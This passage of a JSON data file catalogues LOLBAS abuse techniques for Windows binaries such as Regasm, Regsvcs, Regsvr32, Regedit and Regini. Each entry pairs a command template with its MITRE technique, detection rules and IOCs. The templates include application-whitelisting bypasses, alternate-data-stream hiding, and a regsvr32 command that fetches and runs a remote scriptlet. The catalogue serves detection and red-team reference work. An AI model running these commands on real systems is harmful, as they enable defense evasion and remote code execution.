installation","aliases":[]},{"id":"lolbas:regasm-exe:1","toolId":"lolbas:regasm-exe","toolName":"Regasm.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regasm.exe /U {PATH:.dll}","description":"Loads the target .DLL file and executes the UnRegisterClass function.","usecase":"Execute code and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml"},{"type":"IOC","value":"regasm.exe executing dll file"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regasm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regedit-exe:0","toolId":"lolbas:regedit-exe","toolName":"Regedit.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\\MyCustomRegKey","description":"Export the target Registry key to the specified .REG file.","usecase":"Hide registry data in alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\regedit.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"IOC","value":"regedit.exe reading and writing to alternate data stream"},{"type":"IOC","value":"regedit.exe should normally not be executed by end-users"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regedit/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regedit-exe:1","toolId":"lolbas:regedit-exe","toolName":"Regedit.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"regedit {PATH_ABSOLUTE}:regfile.reg","description":"Import the target .REG file into the Registry.","usecase":"Import hidden registry data from alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\regedit.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"IOC","value":"regedit.exe reading and writing to alternate data stream"},{"type":"IOC","value":"regedit.exe should normally not be executed by end-users"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regedit/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regini-exe:0","toolId":"lolbas:regini-exe","toolName":"Regini.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"regini.exe {PATH}:hidden.ini","description":"Write registry keys from data inside the Alternate data stream.","usecase":"Write to registry","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regini.exe","C:\\Windows\\SysWOW64\\regini.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml"},{"type":"IOC","value":"regini.exe reading from ADS"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regini/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:register-cimprovider-exe:0","toolId":"lolbas:register-cimprovider-exe","toolName":"Register-cimprovider.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Register-cimprovider -path {PATH_ABSOLUTE:.dll}","description":"Load the target .DLL.","usecase":"Execute code within dll file","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Register-cimprovider.exe","C:\\Windows\\SysWOW64\\Register-cimprovider.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml"},{"type":"IOC","value":"Register-cimprovider.exe execution and cmdline DLL load may be supsicious"}],"references":["https://twitter.com/PhilipTsukerman/status/992021361106268161","https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvcs-exe:0","toolId":"lolbas:regsvcs-exe","toolName":"Regsvcs.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvcs.exe {PATH:.dll}","description":"Loads the target .NET DLL file and executes the RegisterClass function.","usecase":"Execute dll file and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvcs-exe:1","toolId":"lolbas:regsvcs-exe","toolName":"Regsvcs.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regsvcs.exe {PATH:.dll}","description":"Loads the target .NET DLL file and executes the RegisterClass function.","usecase":"Execute dll file and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"admin","fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvr32-exe:0","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll","description":"Execute the specified remote .SCT script with scrobj.dll.","usecase":"Execute code from remote scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvr32-exe:1","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll","description":"Execute the specified local .SCT script with scrobj.dll.","usecase":"Execute code from scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvr32-exe:2","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll","description":"Execute the specified remote .SCT script with scrobj.dll.","usecase":"Execute code from remote scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvr32-exe:3","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll","description":"Execute the specified local .SCT script with scrobj.dll.","usecase":"Execute code from scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvr32-exe:4","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32.exe /s {PATH:.dll}","description":"Execute code in a DLL. The code must be inside the exported function `DllRegisterServer`.","usecase":"Execute DLL file","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvr32-exe:5","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32.exe /u /s {PATH:.dll}","description":"Execute code in a DLL. The code must be inside the exported function `DllUnRegisterServer`.","usecase":"Execute DLL file","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:replace-exe:0","toolId":"lolbas:replace-exe","toolName":"Replace.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A","description":"Copy .cab file to destination","usecase":"Copy files","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\replace.exe","C:\\Windows\\SysWOW64\\replace.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Replace.exe 